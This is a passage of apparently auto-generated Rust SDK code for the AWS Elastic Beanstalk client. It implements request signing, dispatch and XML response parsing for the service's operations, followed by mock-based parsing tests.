"DescribeConfigurationSettings"); params.put("Version", "2010-12-01"); DescribeConfigurationSettingsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ConfigurationSettingsDescriptions::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ConfigurationSettingsDescriptionsDeserializer::deserialize("DescribeConfigurationSettingsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeConfigurationSettingsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns information about the overall health of the specified environment. The <b>DescribeEnvironmentHealth</b> operation is only available with AWS Elastic Beanstalk Enhanced Health.</p>"] fn describe_environment_health(&self, input: &DescribeEnvironmentHealthRequest) -> Result<DescribeEnvironmentHealthResult, DescribeEnvironmentHealthError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEnvironmentHealth"); params.put("Version", "2010-12-01"); DescribeEnvironmentHealthRequestSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = DescribeEnvironmentHealthResult::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(DescribeEnvironmentHealthResultDeserializer::deserialize("DescribeEnvironmentHealthResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEnvironmentHealthError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Lists an environment's completed and failed managed actions.</p>"] fn describe_environment_managed_action_history(&self, input: &DescribeEnvironmentManagedActionHistoryRequest) -> Result<DescribeEnvironmentManagedActionHistoryResult, DescribeEnvironmentManagedActionHistoryError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEnvironmentManagedActionHistory"); params.put("Version", "2010-12-01"); DescribeEnvironmentManagedActionHistoryRequestSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = DescribeEnvironmentManagedActionHistoryResult::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(DescribeEnvironmentManagedActionHistoryResultDeserializer::deserialize("DescribeEnvironmentManagedActionHistoryResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEnvironmentManagedActionHistoryError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Lists an environment's upcoming and in-progress managed actions.</p>"] fn describe_environment_managed_actions(&self, input: &DescribeEnvironmentManagedActionsRequest) -> Result<DescribeEnvironmentManagedActionsResult, DescribeEnvironmentManagedActionsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEnvironmentManagedActions"); params.put("Version", "2010-12-01"); DescribeEnvironmentManagedActionsRequestSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = DescribeEnvironmentManagedActionsResult::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(DescribeEnvironmentManagedActionsResultDeserializer::deserialize("DescribeEnvironmentManagedActionsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEnvironmentManagedActionsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns AWS resources for this environment.</p>"] fn describe_environment_resources(&self, input: &DescribeEnvironmentResourcesMessage) -> Result<EnvironmentResourceDescriptionsMessage, DescribeEnvironmentResourcesError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEnvironmentResources"); params.put("Version", "2010-12-01"); DescribeEnvironmentResourcesMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentResourceDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentResourceDescriptionsMessageDeserializer::deserialize("DescribeEnvironmentResourcesResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEnvironmentResourcesError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns descriptions for existing environments.</p>"] fn describe_environments(&self, input: &DescribeEnvironmentsMessage) -> Result<EnvironmentDescriptionsMessage, DescribeEnvironmentsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEnvironments"); params.put("Version", "2010-12-01"); DescribeEnvironmentsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentDescriptionsMessageDeserializer::deserialize("DescribeEnvironmentsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEnvironmentsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns list of event descriptions matching criteria up to the last 6 weeks.</p> <note> <p>This action returns the most recent 1,000 events from the specified <code>NextToken</code>.</p> </note>"] fn describe_events(&self, input: &DescribeEventsMessage) -> Result<EventDescriptionsMessage, DescribeEventsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeEvents"); params.put("Version", "2010-12-01"); DescribeEventsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EventDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EventDescriptionsMessageDeserializer::deserialize("DescribeEventsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeEventsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Retrives detailed information about the health of instances in your AWS Elastic Beanstalk. This operation requires <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced.html\">enhanced health reporting</a>.</p>"] fn describe_instances_health(&self, input: &DescribeInstancesHealthRequest) -> Result<DescribeInstancesHealthResult, DescribeInstancesHealthError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeInstancesHealth"); params.put("Version", "2010-12-01"); DescribeInstancesHealthRequestSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = DescribeInstancesHealthResult::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(DescribeInstancesHealthResultDeserializer::deserialize("DescribeInstancesHealthResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeInstancesHealthError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns a list of the available solution stack names.</p>"] fn list_available_solution_stacks(&self) -> Result<ListAvailableSolutionStacksResultMessage, ListAvailableSolutionStacksError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "ListAvailableSolutionStacks"); params.put("Version", "2010-12-01"); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ListAvailableSolutionStacksResultMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ListAvailableSolutionStacksResultMessageDeserializer::deserialize("ListAvailableSolutionStacksResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(ListAvailableSolutionStacksError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Deletes and recreates all of the AWS resources (for example: the Auto Scaling group, load balancer, etc.) for a specified environment and forces a restart.</p>"] fn rebuild_environment(&self, input: &RebuildEnvironmentMessage) -> Result<(), RebuildEnvironmentError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "RebuildEnvironment"); params.put("Version", "2010-12-01"); RebuildEnvironmentMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(RebuildEnvironmentError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Initiates a request to compile the specified type of information of the deployed environment.</p> <p> Setting the <code>InfoType</code> to <code>tail</code> compiles the last lines from the application server log files of every Amazon EC2 instance in your environment. </p> <p> Setting the <code>InfoType</code> to <code>bundle</code> compresses the application server log files for every Amazon EC2 instance into a <code>.zip</code> file. Legacy and .NET containers do not support bundle logs. </p> <p> Use <a>RetrieveEnvironmentInfo</a> to obtain the set of logs. </p> <p>Related Topics</p> <ul> <li> <p> <a>RetrieveEnvironmentInfo</a> </p> </li> </ul>"] fn request_environment_info(&self, input: &RequestEnvironmentInfoMessage) -> Result<(), RequestEnvironmentInfoError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "RequestEnvironmentInfo"); params.put("Version", "2010-12-01"); RequestEnvironmentInfoMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(RequestEnvironmentInfoError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Causes the environment to restart the application container server running on each Amazon EC2 instance.</p>"] fn restart_app_server(&self, input: &RestartAppServerMessage) -> Result<(), RestartAppServerError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "RestartAppServer"); params.put("Version", "2010-12-01"); RestartAppServerMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(RestartAppServerError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Retrieves the compiled information from a <a>RequestEnvironmentInfo</a> request.</p> <p>Related Topics</p> <ul> <li> <p> <a>RequestEnvironmentInfo</a> </p> </li> </ul>"] fn retrieve_environment_info(&self, input: &RetrieveEnvironmentInfoMessage) -> Result<RetrieveEnvironmentInfoResultMessage, RetrieveEnvironmentInfoError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "RetrieveEnvironmentInfo"); params.put("Version", "2010-12-01"); RetrieveEnvironmentInfoMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = RetrieveEnvironmentInfoResultMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(RetrieveEnvironmentInfoResultMessageDeserializer::deserialize("RetrieveEnvironmentInfoResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(RetrieveEnvironmentInfoError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Swaps the CNAMEs of two environments.</p>"] fn swap_environment_cnam_es(&self, input: &SwapEnvironmentCNAMEsMessage) -> Result<(), SwapEnvironmentCNAMEsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "SwapEnvironmentCNAMEs"); params.put("Version", "2010-12-01"); SwapEnvironmentCNAMEsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(SwapEnvironmentCNAMEsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Terminates the specified environment.</p>"] fn terminate_environment(&self, input: &TerminateEnvironmentMessage) -> Result<EnvironmentDescription, TerminateEnvironmentError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "TerminateEnvironment"); params.put("Version", "2010-12-01"); TerminateEnvironmentMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentDescriptionDeserializer::deserialize("TerminateEnvironmentResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(TerminateEnvironmentError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Updates the specified application to have the specified properties.</p> <note> <p>If a property (for example, <code>description</code>) is not provided, the value remains unchanged. To clear these properties, specify an empty string.</p> </note>"] fn update_application(&self, input: &UpdateApplicationMessage) -> Result<ApplicationDescriptionMessage, UpdateApplicationError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "UpdateApplication"); params.put("Version", "2010-12-01"); UpdateApplicationMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationDescriptionMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationDescriptionMessageDeserializer::deserialize("UpdateApplicationResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(UpdateApplicationError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Modifies lifecycle settings for an application.</p>"] fn update_application_resource_lifecycle(&self, input: &UpdateApplicationResourceLifecycleMessage) -> Result<ApplicationResourceLifecycleDescriptionMessage, UpdateApplicationResourceLifecycleError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "UpdateApplicationResourceLifecycle"); params.put("Version", "2010-12-01"); UpdateApplicationResourceLifecycleMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationResourceLifecycleDescriptionMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationResourceLifecycleDescriptionMessageDeserializer::deserialize("UpdateApplicationResourceLifecycleResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(UpdateApplicationResourceLifecycleError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Updates the specified application version to have the specified properties.</p> <note> <p>If a property (for example, <code>description</code>) is not provided, the value remains unchanged. To clear properties, specify an empty string.</p> </note>"] fn update_application_version(&self, input: &UpdateApplicationVersionMessage) -> Result<ApplicationVersionDescriptionMessage, UpdateApplicationVersionError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "UpdateApplicationVersion"); params.put("Version", "2010-12-01"); UpdateApplicationVersionMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationVersionDescriptionMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationVersionDescriptionMessageDeserializer::deserialize("UpdateApplicationVersionResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(UpdateApplicationVersionError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Updates the specified configuration template to have the specified properties or configuration option values.</p> <note> <p>If a property (for example, <code>ApplicationName</code>) is not provided, its value remains unchanged. To clear such properties, specify an empty string.</p> </note> <p>Related Topics</p> <ul> <li> <p> <a>DescribeConfigurationOptions</a> </p> </li> </ul>"] fn update_configuration_template(&self, input: &UpdateConfigurationTemplateMessage) -> Result<ConfigurationSettingsDescription, UpdateConfigurationTemplateError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "UpdateConfigurationTemplate"); params.put("Version", "2010-12-01"); UpdateConfigurationTemplateMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ConfigurationSettingsDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ConfigurationSettingsDescriptionDeserializer::deserialize("UpdateConfigurationTemplateResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(UpdateConfigurationTemplateError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Updates the environment description, deploys a new application version, updates the configuration settings to an entirely new configuration template, or updates select configuration option values in the running environment.</p> <p> Attempting to update both the release and configuration is not allowed and AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. </p> <p> When updating the configuration settings to a new template or individual settings, a draft configuration is created and <a>DescribeConfigurationSettings</a> for this environment returns two setting descriptions with different <code>DeploymentStatus</code> values. </p>"] fn update_environment(&self, input: &UpdateEnvironmentMessage) -> Result<EnvironmentDescription, UpdateEnvironmentError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "UpdateEnvironment"); params.put("Version", "2010-12-01"); UpdateEnvironmentMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentDescriptionDeserializer::deserialize("UpdateEnvironmentResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(UpdateEnvironmentError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Takes a set of configuration settings and either a configuration template or environment, and determines whether those values are valid.</p> <p>This action returns a list of messages indicating any errors or warnings associated with the selection of option values.</p>"] fn validate_configuration_settings(&self, input: &ValidateConfigurationSettingsMessage) -> Result<ConfigurationSettingsValidationMessages, ValidateConfigurationSettingsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "ValidateConfigurationSettings"); params.put("Version", "2010-12-01"); ValidateConfigurationSettingsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ConfigurationSettingsValidationMessages::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ConfigurationSettingsValidationMessagesDeserializer::deserialize("ValidateConfigurationSettingsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(ValidateConfigurationSettingsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } } #[cfg(test)] mod protocol_tests { extern crate rusoto_mock; use super::*; use self::rusoto_mock::*; use rusoto_core::Region as rusoto_region; #[test] fn test_parse_valid_elasticbeanstalk_check_dns_availability() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-check-dns-availability.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = CheckDNSAvailabilityMessage::default(); let result = client.check_dns_availability(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_create_application_version() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-create-application-version.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = CreateApplicationVersionMessage::default(); let result = client.create_application_version(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_create_application() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-create-application.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = CreateApplicationMessage::default(); let result = client.create_application(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_create_configuration_template() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-create-configuration-template.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = CreateConfigurationTemplateMessage::default(); let result = client.create_configuration_template(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_create_environment() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-create-environment.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = CreateEnvironmentMessage::default(); let result = client.create_environment(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_create_storage_location() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-create-storage-location.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let result = client.create_storage_location(); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_delete_application() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-delete-application.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = DeleteApplicationMessage::default(); let result = client.delete_application(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_describe_application_versions() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-describe-application-versions.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = DescribeApplicationVersionsMessage::default(); let result = client.describe_application_versions(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_describe_applications() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-describe-applications.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = DescribeApplicationsMessage::default(); let result = client.describe_applications(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_describe_configuration_options() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-describe-configuration-options.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = DescribeConfigurationOptionsMessage::default(); let result = client.describe_configuration_options(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_describe_environments() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-describe-environments.xml"); let mock = MockRequestDispatcher::with_status(200).with_body(&mock_response); let client = ElasticBeanstalkClient::new(mock, MockCredentialsProvider, rusoto_region::UsEast1); let request = DescribeEnvironmentsMessage::default(); let result = client.describe_environments(&request); assert!(result.is_ok(), "parse error: {:?}", result); } #[test] fn test_parse_valid_elasticbeanstalk_describe_events() { let mock_response = MockResponseReader::read_response("test_resources/generated/valid", "elasticbeanstalk-describe-events.xml"); let mock = 